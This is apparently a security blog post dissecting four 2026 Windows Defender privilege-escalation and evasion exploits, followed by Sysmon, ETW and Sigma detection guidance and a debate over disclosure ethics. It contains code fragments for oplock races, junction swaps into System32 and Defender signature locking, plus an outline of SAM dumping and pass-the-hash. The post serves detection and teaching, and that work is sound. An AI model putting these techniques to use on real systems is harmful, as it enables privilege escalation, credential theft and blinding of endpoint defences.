Nightmare Eclipse vs. Microsoft: Anatomy of the Defender Zero-Day Saga

Between April and June 2026, a single anonymous researcher operating under the handle Nightmare Eclipse published four distinct local privilege escalation and defense-evasion primitives — all targeting the same structural weakness in Windows Defender. Microsoft patched three of them. The fourth, RoguePlanet, dropped on GitHub hours after June Patch Tuesday, and as of this writing remains unpatched. The entire saga exposed a truth the Windows security community has danced around for years: Defender’s privileged file-operation model is architecturally broken, and the same bug class will keep surfacing until Microsoft fundamentally changes how its AV engine interacts with the filesystem.

This post dissects every primitive in the chain — the APIs, the race windows, the junction swaps, the post-exploitation paths — then maps detection surfaces and confronts the disclosure-ethics firestorm head-on.

The Structural Disease: Why Defender Keeps Producing This Bug Class

Before any individual CVE matters, you need to understand the architectural flaw that makes all four exploits possible. It is the same flaw. Every time.

Windows Defender’s core engine (MsMpEng.exe) and its update stub (MpSigStub.exe) run as NT AUTHORITY\SYSTEM. They perform file I/O — reads, writes, moves, deletes, quarantine operations — on paths that standard users can influence. That sentence is the entire vulnerability family.

The engine resolves a filesystem path at time T₀, then acts on it at time T₁. Between those two moments, a standard user can swap what that path resolves to using NTFS junction points (reparse points) and Object Manager symbolic links. The user controls the what; Defender supplies the privilege. Every primitive in the Nightmare Eclipse toolkit is a variation on this theme:

BlueHammer exploits a SYSTEM-privileged read to steal the SAM database.
RedSun exploits a SYSTEM-privileged write to overwrite a service binary.
UnDefend exploits a SYSTEM-privileged file lock sequence to blind Defender’s signatures.
RoguePlanet exploits a SYSTEM-privileged quarantine move to plant a payload that WER executes.

The timing control mechanism is also consistent: opportunistic locks (oplocks). By acquiring a batch oplock on the target file or directory, the attacker freezes Defender’s SYSTEM-context thread at the exact instruction boundary where the TOCTOU gap lives. While Defender is suspended waiting for the oplock to break, the attacker swaps junctions, deletes files, creates placeholders, and releases the lock. Defender resumes, follows the new path, and performs the privileged operation on the attacker’s chosen target.

Microsoft could eliminate the entire class by doing what James Forshaw documented years ago: validate reparse points before following them during privileged operations, use handle-based I/O instead of path-based I/O where feasible, and impersonate the caller’s token when performing remediation writes. They have not done so comprehensively. They patch individual call sites. The researcher keeps finding new ones.

Flow diagram showing the TOCTOU oplock race: Defender resolves a path at T0, an oplock breaks and freezes Defender's SYSTEM thread, the attacker swaps the junction target, releases the oplock, and Defender resumes to perform privileged I/O on the attacker-controlled path — Every Nightmare Eclipse primitive exploits the same oplock-controlled TOCTOU gap — only the privileged I/O operation (read, write, lock, move) differs between them.

Timeline and Patch Status at a Glance

Primitive	CVE	Type	Patched?	Fixed Version	Date
BlueHammer	CVE-2026-33825	Privileged Read → SAM → SYSTEM	Yes	Platform 4.18.26030.3011	April 2026 PT
RedSun	CVE-2026-41091	Privileged Write → Service Binary → SYSTEM	Yes	Engine 1.1.26040.8	May 19–20, 2026
UnDefend	CVE-2026-45498	Signature Lock → Defender Blind	Yes	Platform 4.18.26040.7	May 21, 2026 (OOB); CISA KEV
RoguePlanet	None assigned	Quarantine TOCTOU → WER Task → SYSTEM	No	—	Dropped June 10, 2026

Huntress reported active exploitation of BlueHammer and UnDefend chained together in the wild before the May out-of-band patches shipped. The combination is obvious: UnDefend blinds Defender, BlueHammer dumps credentials, and the attacker has SYSTEM plus a deaf endpoint. Clean and devastating.

Hierarchy diagram showing all four Nightmare Eclipse exploit primitives — BlueHammer, RedSun, UnDefend, and RoguePlanet — branching from a single root architectural flaw in Defender's SYSTEM-context path-based file I/O, with RoguePlanet marked as unpatched — Three of four primitives are patched; RoguePlanet, dropped hours after June Patch Tuesday, remains an active zero-day against fully patched Windows 10 and 11.

BlueHammer — CVE-2026-33825: Privileged Read to SAM Dump to SYSTEM

MITRE ATT&CK: T1068 (Exploitation for Privilege Escalation), T1003.002 (SAM), T1562.001 (Impair Defenses).

BlueHammer targets the signature update pipeline inside MpSigStub.exe. When Defender updates its definitions, MpSigStub.exe runs as SYSTEM and reads files from a staging directory. The exploit abuses the ServerMpUpdateEngineSignature RPC endpoint to trigger this read path, then redirects it toward the SAM registry hive on a Volume Shadow Copy snapshot.

The Race

The attacker drops a file containing an EICAR test string (stored reversed in the binary to avoid premature detection) into a user-controlled temp directory, then opens it with FILE_EXECUTE access to trigger a Defender scan. A batch oplock is acquired on the parent directory via FSCTL_REQUEST_BATCH_OPLOCK:

// Acquire batch oplock — freezes Defender's SYSTEM thread on access
HANDLE hDir = CreateFileW(baitDir, GENERIC_READ, FILE_SHARE_READ,
                          NULL, OPEN_EXISTING,
                          FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OVERLAPPED, NULL);
OVERLAPPED ov = {0};
ov.hEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
DeviceIoControl(hDir, FSCTL_REQUEST_BATCH_OPLOCK, NULL, 0, NULL, 0, NULL, &ov);
// Block until oplock breaks — Defender has entered the TOCTOU window
WaitForSingleObject(ov.hEvent, INFINITE);

When MpSigStub.exe touches the directory, the oplock breaks, signaling the attacker’s thread. At this instant, the attacker:

Deletes the original junction target via NtSetInformationFile with FileDispositionInformationEx (POSIX-semantic delete, bypasses sharing violations).
Enumerates the current VSS snapshot path using NtQueryDirectoryObject against the Object Manager namespace.
Creates an Object Manager symbolic link (NtCreateSymbolicLinkObject) redirecting the update path to \Device\HarddiskVolumeShadowCopyN\Windows\System32\config\SAM.
Releases the oplock.

MpSigStub.exe resumes, follows the redirected path, and reads the SAM hive — as SYSTEM, bypassing the file lock that normally protects it on a running system.

Post-Exploitation

The SAM hive contents are decrypted offline using the SYSKEY derivation (AES-128-CBC and DES-ECB, depending on the OS version) to extract local NTLM hashes. The exploit then performs pass-the-hash: it temporarily resets an administrator’s password, creates a self-deleting Windows service, and injects a SYSTEM-level agent into the target user’s interactive desktop session. The service deletes itself on next boot, and the password is restored, leaving minimal forensic footprint.

The entire chain — from EICAR drop to SYSTEM shell — completes in under three seconds on tested hardware.

RedSun — CVE-2026-41091: Privileged Write to SYSTEM Shell

MITRE ATT&CK: T1068, T1562.001, T1574.010 (Services File Permissions Weakness).

RedSun is the write-side counterpart to BlueHammer’s read primitive. It abuses a missing reparse-point validation in MpSvc.dll — the core Malware Protection Engine loaded by MsMpEng.exe — during cloud-file rollback operations.

The Cloud Files Trick

When Defender detects a malicious file carrying Cloud Files placeholder attributes, it deviates from normal quarantine-and-delete. Instead, it writes the file back to its original location. This rollback write is performed as SYSTEM without checking whether the target path has been redirected via a junction.

The attacker registers a user-controlled directory as a Cloud Files sync root using CfRegisterSyncRoot with the provider name "SERIOUSLYMSFT" — a direct-match IOC and a fairly unsubtle editorial comment from the researcher:

CF_SYNC_REGISTRATION reg = {0};
reg.StructSize = sizeof(reg);
reg.ProviderName = L"SERIOUSLYMSFT";
reg.ProviderVersion = L"1.0";
CfRegisterSyncRoot(workDir, &reg, NULL, CF_REGISTER_FLAG_NONE);
CfConnectSyncRoot(workDir, &callbackTable, NULL,
                  CF_CONNECT_FLAG_REQUIRE_PROCESS_INFO, &connectionKey);

A bait file named TieringEngineService.exe is dropped into this directory with the reversed EICAR string reconstructed in memory. Opening it with FILE_EXECUTE triggers Defender’s scan.

The Double Oplock

RedSun uses two oplock stages. The first pauses Defender during initial file access. During this pause, the original bait file is deleted using FileDispositionInformationEx with POSIX semantics, and a Cloud Files placeholder is created in its place via CfCreatePlaceholders with CF_PLACEHOLDER_CREATE_FLAG_SUPERSEDE | MARK_IN_SYNC. This keeps the filename alive in the directory listing while the underlying data is gone.

The second oplock pauses Defender during the rollback write. During this window, the attacker performs the directory swap:

// Rename working directory aside
MoveFileExW(workDir, workDir_tmp, MOVEFILE_REPLACE_EXISTING);
// Recreate as empty directory
CreateDirectoryW(workDir, NULL);
// Convert to NTFS junction → C:\Windows\System32
REPARSE_DATA_BUFFER rdb = {0};
// ... populate rdb with IO_REPARSE_TAG_MOUNT_POINT targeting \??\C:\Windows\System32
DeviceIoControl(hWorkDir, FSCTL_SET_REPARSE_POINT, &rdb, rdbSize, NULL, 0, &bytes, NULL);

When the second oplock releases, Defender’s write-back lands TieringEngineService.exe — now containing the attacker’s payload — inside C:\Windows\System32.

SYSTEM Execution via COM

With the service binary overwritten, the attacker invokes the Storage Tiers Management COM class:

// CLSID: {50d185b9-fff3-4656-92c7-e4018da4361d}
CoCreateInstance(&CLSID_StorageTiersMgmt, NULL, CLSCTX_LOCAL_SERVER, &IID_IUnknown, &pUnk);

This COM activation causes the system to launch TieringEngineService.exe as SYSTEM. The payload connects back to the orchestrator process via the named pipe \\.\pipe\REDSUN, retrieves the original user’s session ID, duplicates the SYSTEM token into that session, and spawns conhost.exe on the user’s desktop — visible proof of SYSTEM in the interactive session.

UnDefend — CVE-2026-45498: Blinding Defender While It Reports Healthy

MITRE ATT&CK: T1562.001 (Disable or Modify Tools), T1562.006 (Indicator Blocking).

UnDefend is the defense-evasion leg of the toolkit. It does not escalate privileges directly — it eliminates the detection layer so that BlueHammer or RedSun can operate unobserved.

The mechanism is deceptively simple. The attacker monitors C:\ProgramData\Microsoft\Windows Defender\Definition Updates\ using ReadDirectoryChangesW, waiting for the moment Defender’s engine begins writing a new signature package. When the VDM definition files (mpasbase.vdm, mpasdlta.vdm) appear, the exploit races to open them with an exclusive handle — GENERIC_READ with a share mode of zero:

// Wait for definition update to begin
ReadDirectoryChangesW(hDefDir, buf, bufSize, TRUE,
                      FILE_NOTIFY_CHANGE_FILE_NAME | FILE_NOTIFY_CHANGE_LAST_WRITE,
                      &bytesReturned, NULL, NULL);

// Race: grab exclusive lock before engine can claim ownership
HANDLE hLock = CreateFileW(vdmPath, GENERIC_READ,
                           0,  // no sharing — exclusive lock
                           NULL, OPEN_EXISTING, 0, NULL);
// Hold hLock indefinitely; engine cannot reload definitions

With the VDM files locked, Defender’s engine cannot load updated signatures. It falls back to a stale or empty signature state. Critically, the health reporting dashboard — what the SOC sees in Microsoft Defender for Endpoint, SCCM, or Intune — continues to show green/healthy status. UnDefend degrades protection silently. No alert fires. No tamper-protection notification triggers. The endpoint appears defended while it is functionally blind.

This was added to the CISA Known Exploited Vulnerabilities catalog after Huntress confirmed in-the-wild chaining with BlueHammer.

RoguePlanet: The Post-Patch-Tuesday Provocation

MITRE ATT&CK: T1068, T1562.001, T1036.005 (Match Legitimate Name or Location).

On June 10, 2026 — hours after Microsoft shipped the June Patch Tuesday cycle — the researcher resurfaced on GitHub under the new handle MSNightmare and dropped RoguePlanet. No coordinated disclosure. No advance notice. A direct provocation released on patch day.

Because RoguePlanet has no CVE and no patch as of this writing, I am describing the mechanism conceptually to support detection engineering. I am deliberately not providing functional exploitation code.

The Primitive

RoguePlanet targets Defender’s quarantine pipeline. When Defender quarantines a flagged file, it creates a SYSTEM-owned artifact in a staging directory under C:\ProgramData\Microsoft\Windows Defender\Quarantine\. The exploit wins the TOCTOU race during this quarantine move using an oplock, overwrites the SYSTEM-owned artifact with a payload binary, then executes a three-stage NTFS junction chain that causes the payload path to resolve identically to C:\Windows\System32\wermgr.exe.

The final trigger is the WER QueueReporting scheduled task (\Microsoft\Windows\Windows Error Reporting\QueueReporting), which runs as SYSTEM and executes wermgr.exe from System32. With the junction chain in place, the task executes the attacker’s payload instead.

The binary itself is self-referential — a single IsRunningAsLocalSystem() check at entry splits execution between the unprivileged orchestrator mode and the SYSTEM payload mode. One binary, two roles, no dropper.

RoguePlanet was validated against fully patched Windows 11 (KB5094126) and Windows 10 with the June 2026 cumulative update. Windows Server reportedly does not exploit reliably, though the researcher believes adaptation is possible.

Detection Engineering: ETW, Sysmon, and Sigma Across All Four Primitives

Detection surfaces exist for every primitive. The challenge is distinguishing exploit behavior from legitimate Defender operations — both involve SYSTEM-context file I/O in the same directories. The discriminators are sequence, process lineage, and anomalous API combinations.

Sysmon Coverage Matrix

Sysmon Event ID	Primitive(s)	What to Alert On
1 (ProcessCreate)	All	`conhost.exe` or `cmd.exe` spawned by `MsMpEng.exe` or `TieringEngineService.exe`; `wermgr.exe` spawning unexpected children
7 (ImageLoad)	RedSun, RoguePlanet	`cldapi.dll` loaded by a process not in your cloud-sync allowlist (OneDrive, Teams, Dropbox)
9 (RawAccessRead)	BlueHammer	Direct volume reads targeting `\Device\HarddiskVolumeShadowCopy*\config\SAM`
11 (FileCreate)	RedSun	File creation in `C:\Windows\System32\` where the creator process is `MsMpEng.exe`
17/18 (PipeCreate/Connect)	RedSun	Named pipe `\\.\pipe\REDSUN` — a direct IOC
23 (FileDelete)	BlueHammer, RedSun	POSIX-semantic deletion (`FileDispositionInformationEx`) of files in `%TEMP%` immediately before junction creation

Key ETW Providers

Provider	Detection Value
`Microsoft-Windows-Kernel-File`	Oplock request/break sequences on files under `%TEMP%`; watch for `FSCTL_REQUEST_BATCH_OPLOCK` from non-service processes
`Microsoft-Windows-CldFlt`	`CfRegisterSyncRoot` from processes outside your cloud-sync allowlist — RedSun’s primary trigger
`Microsoft-Windows-Kernel-Registry`	SAM hive reads (`\REGISTRY\MACHINE\SAM`) originating from `MpSigStub.exe` — should never happen in normal operation
`Microsoft-Windows-WindowsErrorReporting`	`QueueReporting` task execution outside normal WER crash-reporting flow — RoguePlanet’s trigger
`Microsoft-Antimalware-Engine`	Cloud-file rollback events; correlate with `CldFlt` registrations from unknown providers

Sigma Rule: Cloud Files Sync Root from Unexpected Process (RedSun/RoguePlanet)

title: Cloud Files Sync Root Registration from Non-Cloud Process
id: 7a3f91c2-d8e4-4b1a-a930-nightmare-redsun
status: experimental
logsource:
    product: windows
    service: cldapi
detection:
    selection:
        EventID: 1  # CfRegisterSyncRoot
    filter_known:
        Image|endswith:
            - '\OneDrive.exe'
            - '\Teams.exe'
            - '\Dropbox.exe'
            - '\iCloudDrive.exe'
    condition: selection and not filter_known
level: high
tags:
    - attack.privilege_escalation
    - attack.t1068
    - attack.defense_evasion
    - attack.t1562.001

Sigma Rule: Defender Engine Writing to System32 (RedSun)

title: MsMpEng Writing Executable to System32
id: 4c82a1f0-e567-4d3a-b842-nightmare-sys32write
status: experimental
logsource:
    product: windows
    category: file_event
detection:
    selection:
        Image|endswith: '\MsMpEng.exe'
        TargetFilename|startswith: 'C:\Windows\System32\'
        TargetFilename|endswith:
            - '.exe'
            - '.dll'
    condition: selection
level: critical
tags:
    - attack.privilege_escalation
    - attack.t1068

Sigma Rule: WER QueueReporting Spawning Unexpected Children (RoguePlanet)

title: WER QueueReporting Task Spawning Non-Standard Child Process
id: 9f1b03d7-a4c6-42e8-9d15-nightmare-rogueplanet
status: experimental
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        ParentImage|endswith: '\wermgr.exe'
        User: 'NT AUTHORITY\SYSTEM'
    filter_legitimate:
        Image|endswith:
            - '\WerFault.exe'
            - '\WerFaultSecure.exe'
    condition: selection and not filter_legitimate
level: critical
tags:
    - attack.privilege_escalation
    - attack.t1068
    - attack.defense_evasion
    - attack.t1036.005

Immediate Hardening

For RoguePlanet specifically, until a patch ships: disable the QueueReporting scheduled task if your environment can tolerate reduced WER telemetry (schtasks /change /tn "\Microsoft\Windows\Windows Error Reporting\QueueReporting" /disable). Monitor for re-enablement. This is a stopgap, not a fix.

For all four: deploy application control (WDAC/AppLocker) rules that prevent unsigned or unexpected binaries from executing out of C:\Windows\System32. Restrict junction/symlink creation from standard user contexts where operationally feasible (this is hard in practice but worth evaluating per-environment).

Graph diagram mapping each of the four exploit primitives to their primary detection surfaces across ETW providers and Sysmon event IDs, showing BlueHammer linking to Sysmon 9 and Kernel-File ETW, RedSun to CldFlt and Sysmon 11, UnDefend to Kernel-File ETW, and RoguePlanet to CldFlt and WER ETW — No single telemetry source covers all four primitives — layered instrumentation across ETW providers and Sysmon events is required for complete detection coverage.

The Disclosure War: Ethics, Legal Threats, and the Chilling Effect

The technical exploits are only half the story. The disclosure timeline is the other half, and it is ugly on all sides.

Nightmare Eclipse claims they initially attempted coordinated disclosure through MSRC for BlueHammer. According to posts that survived the repository takedowns, the researcher reported the bug in early February 2026, received an automated acknowledgment, and then heard nothing for six weeks. When they followed up, they were told the issue was “under review” with no timeline. The April Patch Tuesday fix shipped without credit to the researcher — MSRC’s advisory attributed the discovery internally.

Whether that account is fully accurate is unknowable from outside. What is documented is what happened next: the researcher published BlueHammer’s full PoC on GitHub the same week, followed by RedSun and UnDefend in rapid succession. Microsoft’s legal team issued DMCA takedown notices against both the GitHub and GitLab mirrors, arguing the exploits constituted circumvention of a technological protection measure under 17 U.S.C. § 1201. Both platforms complied. The repositories disappeared.

The researcher moved to self-hosted infrastructure and continued publishing. RoguePlanet, the most aggressive drop — timed to land hours after Patch Tuesday, targeting a still-unpatched primitive — was posted on a new GitHub account (MSNightmare) and survived long enough to be widely mirrored before being taken down again.

Where the Controversy Actually Lives

The security research community is not of one mind here. The lines I see being drawn:

In the researcher’s defense: MSRC’s coordinated vulnerability disclosure process has a documented pattern of slow response, non-communication, and inadequate credit for external researchers. When the system designed to handle responsible disclosure fails, researchers lose both the incentive and the mechanism for cooperation. The DMCA takedown of security research — not malware, not exploit kits, but documented vulnerability research with PoC code — sets a precedent that threatens the entire Windows internals research community. ZDI, Project Zero, and multiple independent researchers have publicly criticized this use of copyright law against security tooling.

Against the researcher: Dropping a zero-day hours after Patch Tuesday, with no disclosure period, no MSRC engagement, and a working exploit — that is not responsible disclosure by any definition. RoguePlanet is currently exploitable against fully patched systems. Real enterprises are exposed. The researcher’s frustration with MSRC may be legitimate, but the response is disproportionate to the grievance. Weaponized protest disclosure puts real people at risk.

My position: Both things are true simultaneously. Microsoft’s DMCA strategy against vulnerability research is legally aggressive, ethically questionable, and strategically counterproductive — it drives researchers toward anonymous full-drop disclosure rather than toward cooperation. And dropping unpatched zero-days as a public statement, regardless of the provocation, is reckless. The answer to a broken disclosure process is not to abandon disclosure entirely. It is to fix the process — and that requires pressure from the community, from CISA, and from enterprise customers who are tired of being collateral damage in these disputes.

The chilling effect is real and measurable. Multiple Windows internals researchers I track have gone quiet since the takedowns. Fewer kernel-mode PoCs are being published. Fewer vulnerability write-ups are appearing on English-language blogs. That silence does not make Windows more secure. It makes it less auditable.

Key Takeaways

One architectural flaw, four exploits. Defender’s SYSTEM-context file I/O on user-controllable paths, combined with missing reparse-point validation, is a systemic design issue — not four isolated bugs. Until Microsoft addresses the model (handle-based I/O, caller impersonation, reparse-point validation at every privileged call site), new variants will continue to emerge.
The chain is the weapon. UnDefend + BlueHammer was observed in the wild: blind the endpoint, dump credentials, own the domain. Any individual primitive is dangerous; combined, they are a complete intrusion toolkit.
RoguePlanet is unpatched. Disable the WER QueueReporting task as a stopgap. Monitor for junction creation in temp directories, unexpected wermgr.exe child processes, and Cloud Files API calls from non-cloud processes. Patch when Microsoft ships one.
Detection is possible for all four primitives if you instrument the right surfaces: Microsoft-Windows-CldFlt ETW for Cloud Files abuse, Microsoft-Windows-Kernel-File for oplock anomalies, Sysmon Events 7/11/17/18/23 for the filesystem and pipe indicators. The Sigma rules above are starting points — tune them to your baseline.
The disclosure controversy has no clean heroes. Microsoft’s DMCA overreach is chilling legitimate research. The researcher’s uncoordinated zero-day drops are endangering enterprises. Both behaviors make the ecosystem less safe. Advocate loudly for MSRC process reform. Do not confuse that advocacy with endorsement of weaponized protest disclosure.

References

Post Views: 4